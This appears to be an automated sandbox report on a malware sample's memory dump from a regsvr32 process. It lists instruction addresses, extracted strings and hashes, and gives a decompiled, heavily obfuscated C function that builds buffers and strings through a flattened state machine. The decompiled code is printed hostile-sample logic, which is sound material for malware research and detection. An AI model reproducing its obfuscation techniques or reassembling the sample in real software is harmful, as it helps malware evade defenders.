0x04b41ca3
0x04b41e0d
0x04b41e19
0x04b41e1d
0x04b41e2b
0x04b41e3a
0x04b41e41
0x04b41e48
0x04b41e97
0x04b41ea7
0x04b41eb6
0x04b41ed6
0x04b41edb
0x04b41ee2
0x00000000
0x04b41ca9
0x04b41caf
0x04b41dfd
0x04b41e03
0x04b41c7c
0x04b41c7c
0x00000000
0x04b41c7c
0x04b41cb5
0x04b41cb7
0x04b41cf7
0x04b41d03
0x04b41d0a
0x04b41d1d
0x04b41d28
0x04b41d38
0x04b41d76
0x04b41d7b
0x04b41d7e
0x04b41d85
0x04b41dbe
0x04b41d87
0x04b41d9f
0x04b41daf
0x04b41db4
0x04b41db7
0x04b41db7
0x04b41de1
0x04b41de6
0x04b420f6
0x04b420f6
0x04b420fb
0x04b42100
0x04b42105
0x00000000
0x04b41cb9
0x04b41cbf
0x04b4212e
0x04b41cc5
0x04b41cc7
0x04b41ce3
0x04b41cea
0x04b41cf0
0x04b41cf2
0x04b41c7c
0x04b41c7c
0x04b41c81
0x04b41c86
0x04b41c86
0x00000000
0x04b41c86
0x04b41cc9
0x04b41ccf
0x00000000
0x04b41cd5
0x04b41cd5
0x00000000
0x04b41cd5
0x04b41ccf
0x04b41cc7
0x04b41cbf
0x04b41cb7
0x04b41caf
0x04b41ca3
0x04b42137
0x04b42141
0x04b42141
0x04b41f14
0x04b41f1a
0x04b4204f
0x04b4205b
0x04b42062
0x04b420c6
0x04b420dd
0x04b420ee
0x04b420f3
0x00000000
0x04b41f20
0x04b41f20
0x04b41f22
0x04b42038
0x04b4203d
0x04b42045
0x04b42047
0x00000000
0x04b41f28
0x04b41f28
0x04b41f2e
0x04b41ffc
0x04b42003
0x04b41c7c
0x04b41c7c
0x00000000
0x04b41c7c
0x04b41f34
0x04b41f34
0x04b41f3a
0x04b41f86
0x04b41fb6
0x04b41fbd
0x04b41fcc
0x04b41fce
0x04b41fd3
0x04b41fd8
0x00000000
0x04b41f3c
0x04b41f3c
0x04b41f3e
0x00000000
0x04b41f44
0x04b41f6f
0x04b41f71
0x04b41f76
0x00000000
0x04b41f76
0x04b41f3e
0x04b41f3a
0x04b41f2e
0x04b41f22
0x00000000
0x04b4210a
0x04b4210a
0x04b4210a
0x00000000
0x04b42116
0x04b41c86
0x04b41c81

Strings

nB[N, xrefs: 04B417C9
SG<, xrefs: 04B41AB3
], xrefs: 04B41918
o]n, xrefs: 04B41A6A
Xn!, xrefs: 04B41266
inpG, xrefs: 04B413FF
KN, xrefs: 04B4151A
x, xrefs: 04B415B4
D)/, xrefs: 04B41C2B
0H\, xrefs: 04B416ED
2^~, xrefs: 04B4150A
2f, xrefs: 04B41956
inpG, xrefs: 04B41419
jW, xrefs: 04B4107F
Na$, xrefs: 04B412C5
buV, xrefs: 04B41BE4
R, xrefs: 04B41AF4
y.n, xrefs: 04B41719

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
API String ID: 0-421492616
Opcode ID: 37a58dbba7ece3ff81ea8403e011052f751c3aae32ad51647a16251177c97ee8
Instruction ID: 8dacdc010b0b292e9c73a70c638a46665211837630b5b050cd7c6359a10cd9a1
Opcode Fuzzy Hash: 37a58dbba7ece3ff81ea8403e011052f751c3aae32ad51647a16251177c97ee8
Instruction Fuzzy Hash: DE9211715093818FD378CF65C98AB9BBBE2FBC4304F10891DE69A86260D7B19949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B42E5D, Relevance: 21.9, Strings: 17, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E04B42E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0x4b31808);
								_v292 = _t770;
								_t708 = L04B44244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E04B4E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E04B4FECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E04B3C5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E04B4CCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E04B3E404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								L04B52B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E04B3C5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E04B4CCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E04B3E404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
							E04B4C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E04B4CCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E04B4CCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E04B3E404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E04B4E1F8(0x4b317a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E04B531AA(0xb00b1257, 0x44)))();
							E04B4FECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0x4b31778);
						_t750 = L04B33325( &_v256, L04B44244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E04B4FECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}

0x04b42e5d
0x04b42e5d
0x04b42e67
0x04b42e6e
0x04b42e72
0x04b42e7d
0x04b42e8d
0x04b42e94
0x04b42e99
0x04b42ea4
0x04b42eb4
0x04b42eb9
0x04b42ebf
0x04b42ec7
0x04b42ecc
0x04b42ed4
0x04b42edc
0x04b42ee4
0x04b42eec
0x04b42ef4
0x04b42efc
0x04b42f04
0x04b42f11
0x04b42f14
0x04b42f18
0x04b42f20
0x04b42f28
0x04b42f30
0x04b42f40
0x04b42f44
0x04b42f4c
0x04b42f54
0x04b42f5f
0x04b42f72
0x04b42f73
0x04b42f7a
0x04b42f85
0x04b42f8d
0x04b42f92
0x04b42f97
0x04b42f9f
0x04b42fa7
0x04b42fb2
0x04b42fba
0x04b42fc5
0x04b42fd9
0x04b42fe0
0x04b42feb
0x04b42ff6
0x04b42ffe
0x04b43003
0x04b4300b
0x04b43013
0x04b4301b
0x04b43028
0x04b4302c
0x04b43034
0x04b4303c
0x04b43047
0x04b43052
0x04b4305d
0x04b43068
0x04b43070
0x04b43080
0x04b43085
0x04b4308b
0x04b43090
0x04b43098
0x04b430a0
0x04b430ad
0x04b430ae
0x04b430b2
0x04b430ba
0x04b430c2
0x04b430cd
0x04b430d5
0x04b430e0
0x04b430eb
0x04b430f6
0x04b43101
0x04b4310c
0x04b43117
0x04b43122
0x04b4312a
0x04b43135
0x04b43140
0x04b43153
0x04b4315a
0x04b43165
0x04b43172
0x04b43176
0x04b4317e
0x04b43186
0x04b4318e
0x04b4319b
0x04b4319f
0x04b431a7
0x04b431af
0x04b431b7
0x04b431c2
0x04b431cd
0x04b431d8
0x04b431eb
0x04b431f2
0x04b431fa
0x04b43205
0x04b43210
0x04b4321b
0x04b43226
0x04b43231
0x04b4323c
0x04b43247
0x04b43252
0x04b4325d
0x04b43265
0x04b4326f
0x04b43273
0x04b4327b
0x04b43283
0x04b43297
0x04b4329e
0x04b432a9
0x04b432b4
0x04b432bc
0x04b432c4
0x04b432c9
0x04b432ce
0x04b432d6
0x04b432e1
0x04b432e9
0x04b432f4
0x04b432fe
0x04b43303
0x04b43311
0x04b43316
0x04b4331c
0x04b43324
0x04b4332f
0x04b4333f
0x04b43342
0x04b43349
0x04b43354
0x04b4335c
0x04b43369
0x04b4336d
0x04b43375
0x04b43380
0x04b4338b
0x04b43396
0x04b4339e
0x04b433a3
0x04b433ab
0x04b433b3
0x04b433bb
0x04b433c3
0x04b433cb
0x04b433d3
0x04b433db
0x04b433e3
0x04b433f6
0x04b433f9
0x04b43400
0x04b4340b
0x04b43416
0x04b43421
0x04b4342c
0x04b43437
0x04b43442
0x04b4344d
0x04b43458
0x04b4346e
0x04b43475
0x04b4347d
0x04b43488
0x04b43490
0x04b4349c
0x04b4349f
0x04b434a3
0x04b434a8
0x04b434b0
0x04b434bb
0x04b434c6
0x04b434d1
0x04b434dc
0x04b434e4
0x04b434ef
0x04b434fa
0x04b43505
0x04b43510
0x04b4351b
0x04b43526
0x04b43539
0x04b43540
0x04b4354d
0x04b43555
0x04b4355d
0x04b43565
0x04b4356a
0x04b43572
0x04b4357d
0x04b43588
0x04b43593
0x04b4359e
0x04b435a6
0x04b435b1
0x04b435c5
0x04b435ca
0x04b435d3
0x04b435de
0x04b435ea
0x04b435ef
0x04b435f5
0x04b435fd
0x04b43602
0x04b4360a
0x04b43615
0x04b43620
0x04b4362b
0x04b4363e
0x04b43641
0x04b43653
0x04b4365a
0x04b43665
0x04b43670
0x04b43678
0x04b43683
0x04b4368e
0x04b43696
0x04b4369e
0x04b436a9
0x04b436b4
0x04b436bf
0x04b436ca
0x04b436d7
0x04b436da
0x04b436de
0x04b436e3
0x04b436eb
0x04b436f3
0x04b43703
0x04b43707
0x04b4370f
0x04b43717
0x04b4371f
0x04b43727
0x04b4372f
0x04b43737
0x04b4373c
0x04b43744
0x04b43756
0x04b43759
0x04b43760
0x04b4376d
0x04b43775
0x04b43784
0x04b43787
0x04b4378e
0x04b43792
0x04b4379a
0x04b437a2
0x04b437b2
0x04b437ba
0x04b437bf
0x04b437c6
0x04b437ca
0x04b437d2
0x04b437da
0x04b437ee
0x04b437f5
0x04b437fc
0x04b43807
0x04b4381a
0x04b43821
0x04b43829
0x04b43834
0x04b4383f
0x04b43852
0x04b43859
0x04b43864
0x04b4386f
0x04b4387a
0x04b43885
0x04b43890
0x04b43898
0x04b438a3
0x04b438ae
0x04b438b9
0x04b438c1
0x04b438cc
0x04b438d7
0x04b438e2
0x04b438ed
0x04b438f5
0x04b438fd
0x04b4390a
0x04b4390e
0x04b43916
0x04b43921
0x04b4392c
0x04b43934
0x04b4393f
0x04b4393f
0x04b4393f
0x04b43944
0x04b43944
0x04b43944
0x04b43944
0x04b4394a
0x00000000
0x00000000
0x04b43be6
0x04b43be8
0x04b43ca8
0x04b43caf
0x04b43cb2
0x04b43cc7
0x04b43ccc
0x04b43cd3
0x04b43cda
0x04b43d26
0x04b43d34
0x04b43d39
0x04b43d40
0x04b43d43
0x04b43d48
0x00000000
0x04b43d48
0x04b43bee
0x04b43bf4
0x04b43c6d
0x04b43c84
0x04b43c85
0x04b43c87
0x04b43c8c
0x04b43c8f
0x04b43c96
0x04b43c98
0x04b43a22
0x04b43a22
0x04b43c9e
0x04b43a8d
0x04b43a8d
0x04b4393f
0x04b4393f
0x04b4393f
0x00000000
0x04b4393f
0x04b4393f
0x04b43bf6
0x04b43bfc
0x04b43c36
0x04b43c37
0x04b43c41
0x04b43c4a
0x04b43c4b
0x04b43c4c
0x04b43c59
0x04b43c5a
0x04b43c5f
0x04b43a8a
0x04b43a8a
0x00000000
0x04b43a8a
0x04b43bfe
0x04b43c04
0x04b43d77
0x00000000
0x04b43d7e
0x04b43c0a
0x04b43c10
0x00000000
0x00000000
0x04b43c16
0x04b43c16
0x04b43950
0x04b43bb0
0x04b43bc1
0x04b43bc2
0x04b43bc4
0x04b43bc9
0x04b43bcd
0x04b43bcf
0x04b43bd7
0x04b43bd9
0x04b43bde
0x00000000
0x04b43bde
0x04b4395c
0x04b43b72
0x04b43b73
0x04b43b7d
0x04b43b86
0x04b43b87
0x04b43b88
0x04b43b95
0x04b43b96
0x04b43b9b
0x00000000
0x04b43b9b
0x04b43968
0x04b43b46
0x04b43b4b
0x04b43b52
0x04b43b55
0x04b43b5a
0x00000000
0x04b43b5a
0x04b43974
0x04b43a9d
0x04b43ab6
0x04b43ab7
0x04b43ac1
0x04b43ac3
0x04b43ac6
0x04b43acd
0x04b43acf
0x04b43ad1
0x04b43ad3
0x04b43adc
0x04b43adc
0x04b43ade
0x04b43ae0
0x04b43ae2
0x04b43ae5
0x04b43ae5
0x04b43ae5
0x04b43ae5
0x04b43afe
0x04b43aff
0x04b43b04
0x04b43b09
0x04b43b0a
0x04b43b0c
0x04b43b0d
0x04b43b1d
0x04b43b1e
0x04b43b23
0x00000000
0x04b43b23
0x04b43980
0x04b43a23
0x04b43a2c
0x04b43a33
0x04b43a3e
0x04b43a43
0x04b43a54
0x04b43a55
0x04b43a56
0x04b43a57
0x04b43a66
0x04b43a80
0x04b43a85
0x00000000
0x04b43a85
0x04b43986
0x04b4398c
0x00000000
0x00000000
0x04b43992
0x04b43996
0x04b439a5
0x04b439d6
0x04b439fb
0x04b43a00
0x04b43a0c
0x04b43a0e
0x04b43a11
0x00000000
0x04b43d4d
0x04b43d4d
0x04b43d4d
0x00000000
0x04b43d59

Strings

*a<, xrefs: 04B4354D
5S, xrefs: 04B4357D
DO, xrefs: 04B4371F
!s9, xrefs: 04B43375
8j, xrefs: 04B435A6
kn_, xrefs: 04B430C2
Gd, xrefs: 04B43117
Sg, xrefs: 04B43098
1TPy, xrefs: 04B4310C
I,, xrefs: 04B42F85
3, xrefs: 04B42FBA
|I9, xrefs: 04B431A7
-3n3, xrefs: 04B42F18
9I , xrefs: 04B43834
$7, xrefs: 04B43231
